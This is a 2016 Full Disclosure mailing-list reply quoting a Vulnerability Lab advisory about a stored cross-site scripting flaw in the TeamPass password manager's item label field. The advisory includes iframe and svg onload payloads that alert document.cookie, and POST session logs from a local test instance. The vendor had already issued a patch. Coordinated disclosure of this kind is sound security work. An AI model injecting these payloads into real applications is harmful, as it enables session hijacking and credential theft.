Date: Wed, 25 May 2016 21:05:07 +1000
From: Ulisses Montenegro <ulisses.montenegro@...il.com>
To: Vulnerability Lab <research@...nerability-lab.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Teampass v2.1.26 - Stored Cross Site Scripting Vulnerability

This looks very similar to the persistent XSS reported a while ago on the
Teampass GitHub; is it the same vulnerability?

https://github.com/nilsteampassnet/TeamPass/issues/1244



On 25 May 2016 at 19:10, Vulnerability Lab <research@...nerability-lab.com>
wrote:

> Document Title:
> ===============
> Teampass v2.1.26 - Stored Cross Site Scripting Vulnerability
>
>
> References (Source):
> ====================
> http://www.vulnerability-lab.com/get_content.php?id=1845
>
>
> Release Date:
> =============
> 2016-05-24
>
>
> Vulnerability Laboratory ID (VL-ID):
> ====================================
> 1845
>
>
> Common Vulnerability Scoring System:
> ====================================
> 3.4
>
>
> Product & Service Introduction:
> ===============================
> TeamPass is a passwords manager dedicated to managing passwords in a
> collaborative way on any Apache, MySQL and PHP server.
> It is especially designed to provide password access security for allowed
> people. This makes TeamPass really useful in a
> business/enterprise environment and provides IT or team managers with a
> powerful and easy tool for customizing password
> access depending on the user's role.
>
> (Copy of the Homepage:  http://teampass.net/  )
>
>
> Abstract Advisory Information:
> ==============================
> An independent vulnerability laboratory researcher discovered an
> application-side cross site scripting vulnerability in the Teampass
> v2.1.25/26 application.
>
>
> Vulnerability Disclosure Timeline:
> ==================================
> 2016-05-17: Researcher Notification & Coordination (Peter Kok)
> 2016-05-18: Vendor Notification (Teampass Security Team)
> 2016-05-18: Vendor Response/Feedback (Teampass Security Team)
> 2016-05-23: Vendor Fix/Patch (Teampass Developer Team)
> 2016-05-24: Public Disclosure (Vulnerability Laboratory)
>
>
> Discovery Status:
> =================
> Published
>
>
> Affected Product(s):
> ====================
> Nils Laumaillé
> Product: Teampass Password Manager - Online Service (Web-Application)
> 2.1.25
>
> Nils Laumaillé
> Product: Teampass Password Manager - Online Service (Web-Application)
> 2.1.26
>
>
> Exploitation Technique:
> =======================
> Remote
>
>
> Severity Level:
> ===============
> Medium
>
>
> Technical Details & Description:
> ================================
> An application-side cross site scripting web vulnerability has been
> discovered in the official Teampass v2.1.26 web-application.
> The vulnerability allows remote attackers to inject their own malicious
> script code into the application side of the vulnerable module or function.
>
> Teampass allows authenticated users to create items to store usernames,
> passwords, descriptions, files and more. When creating or editing an
> item the very first field, the label field, is vulnerable to iframe
> injection and XSS insertion. The iframe or cross site scripting will be
> executed as soon as a user opens a folder. The attack vector is persistent
> and the request method to inject is POST.
>
> The security risk of the application-side vulnerability is estimated as
> medium with a CVSS (Common Vulnerability Scoring System) score of 3.4.
> Exploitation of the persistent web vulnerability requires a low privileged
> web-application user account and low or medium user interaction.
> Successful exploitation of the vulnerability results in session hijacking,
> persistent phishing attacks, persistent external redirects to
> malicious sources and persistent manipulation of affected or connected
> application modules.
>
> Request Method(s):
>                                 [+] POST
>
> Vulnerable Function(s):
>                                 [+] Add or Edit (Label)
>
> Vulnerable Parameter(s):
>                                 [+] label name
>
> Affected Module(s):
>                                 [+] Item Listing
>
>
> Proof of Concept (PoC):
> =======================
> The persistent cross site scripting web vulnerability can be exploited by
> remote attackers without a privileged web-application user account and low or
> medium user interaction.
> For security demonstration or to reproduce the vulnerability follow the
> provided information and steps below to continue.
>
> Manual steps to reproduce the vulnerability ...
> 1. Create or edit an item
> 2. Change the first label name field to a script code payload
> Note: Vulnerability Lab"><iframe SRC="http://www.vulnerability-lab.com/"
> onload=alert(document.cookie)<></iframe>  or
> <svg/onload=alert(document.cookie)>
> 3. The execution occurs in the main label field output context
> 4. Successful reproduction of the application-side vulnerability!
>
>
> --- PoC Session Logs [POST] ---
> Status: 200[OK]
> POST http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73
> Mime Type[application/json]
>    Request Header:
>       Host[teampass.localhost:8080]
>       User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
> Gecko/20100101 Firefox/46.0]
>       Accept[application/json, text/javascript, */*; q=0.01]
>       X-Requested-With[XMLHttpRequest]
>       Referer[http://teampass.localhost:8080/index.php/pwd/view/73]
>       Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1;
> PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6]
>       Connection[keep-alive]
>    POST Data:
>       cproject_id[23]
>       password_id[73]
>       name[Dans+Linux+user+%22%3E%3C[SCRIPT CODE PAYLOAD INJECTED VIA NAME
> LABEL!]%3E]
>       tags[]
>       hidden-tags[]
>       access_info[]
>       faketextdonotautofill1[]
>       username[dan]
>       faketextdonotautofill2[]
>       email[]
>       fakepwddonotautofill1[]
>       password[hello]
>       password_visible[hello]
>       fakepwddonotautofill2[]
>       repeat_password[hello]
>       repeat_password_visible[hello]
>       expiry_date_edit[]
>       notes[]
>    Response Header:
>       Date[Wed, 25 May 2016 08:53:48 GMT]
>       Server[Apache]
>       X-Powered-By[PHP/5.4.4-14+deb7u8]
>       Expires[Thu, 19 Nov 1981 08:52:00 GMT]
>       Cache-Control[no-store, no-cache, must-revalidate, post-check=0,
> pre-check=0]
>       Pragma[no-cache]
>       Content-Length[74]
>       Keep-Alive[timeout=5, max=99]
>       Connection[Keep-Alive]
>       Content-Type[application/json; charset=utf-8]
> -
> Status: 200[OK]
> GET http://teampass.localhost:8080/index.php/checkss/n/pwd
> Mime Type[text/html]
>    Request Header:
>       Host[teampass.localhost:8080]
>       User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
> Gecko/20100101 Firefox/46.0]
>       Accept[text/html, */*; q=0.01]
>       X-Requested-With[XMLHttpRequest]
>       Referer[http://teampass.localhost:8080/index.php/pwd/view/73]
>       Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1;
> __utmb=66503851.1.10.1464166381; PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6]
>       Connection[keep-alive]
>    Response Header:
>       Date[Wed, 25 May 2016 08:53:49 GMT]
>       Server[Apache]
>       X-Powered-By[PHP/5.4.4-14+deb7u8]
>       Connection[Keep-Alive]
>       Content-Type[text/html]
>
>
> Reference(s):
> http://teampass.localhost:8080/
> http://teampass.localhost:8080/index.php/
> http://teampass.localhost:8080/index.php/pwd/
> http://teampass.localhost:8080/index.php/checkss/
> http://teampass.localhost:8080/index.php/checkss/n/
> http://teampass.localhost:8080/index.php/checkss/n/pwd
> http://teampass.localhost:8080/index.php/pwd/aj_edit_save/
> http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73
>
>
> Security Risk:
> ==============
> The security risk of the application-side cross site scripting
> vulnerability in the teampass application is estimated as medium. (CVSS 3.4)
>
>
> Credits & Authors:
> ==================
> Peter Kok -  [http://www.vulnerability-lab.com/show.php?user=Peter%20Kok]
>
>
> Disclaimer & Information:
> =========================
> The information provided in this advisory is provided as is without any
> warranty. Vulnerability Lab disclaims all warranties, either expressed or
> implied, including the warranties of merchantability and capability for a
> particular purpose. Vulnerability-Lab or its suppliers are not liable in any
> case of damage, including direct, indirect, incidental, consequential loss of
> business profits or special damages, even if Vulnerability-Lab or its
> suppliers have been advised of the possibility of such damages. Some states do
> not allow the exclusion or limitation of liability for consequential or
> incidental damages, so the foregoing limitation may not apply. We do not
> approve or encourage anybody to break any licenses, policies, deface websites,
> hack into databases or trade with stolen data.
>
> Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
> Contact:    admin@...nerability-lab.com - research@...nerability-lab.com - admin@...lution-sec.com
> Section:    magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
> Social:     twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
> Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
> Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
>
> Any modified copy or reproduction, including partial usage, of this file
> requires authorization from Vulnerability Laboratory. Permission to
> electronically redistribute this alert in its unmodified form is granted. All
> other rights, including the use of other media, are reserved by
> Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
> advisories, source code, videos and other information on this website are
> trademarks of the vulnerability-lab team and the specific authors or managers.
> To record, list, modify, use or edit our material, contact (admin@ or
> research@...nerability-lab.com) to ask permission.
>
>                                     Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
>
>
>
>
> --
> VULNERABILITY LABORATORY - RESEARCH TEAM
> SERVICE: www.vulnerability-lab.com
> CONTACT: research@...nerability-lab.com
>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/




-- 
“If debugging is the process of removing software bugs, then programming
must be the process of putting them in.” - *Edsger Dijkstra*
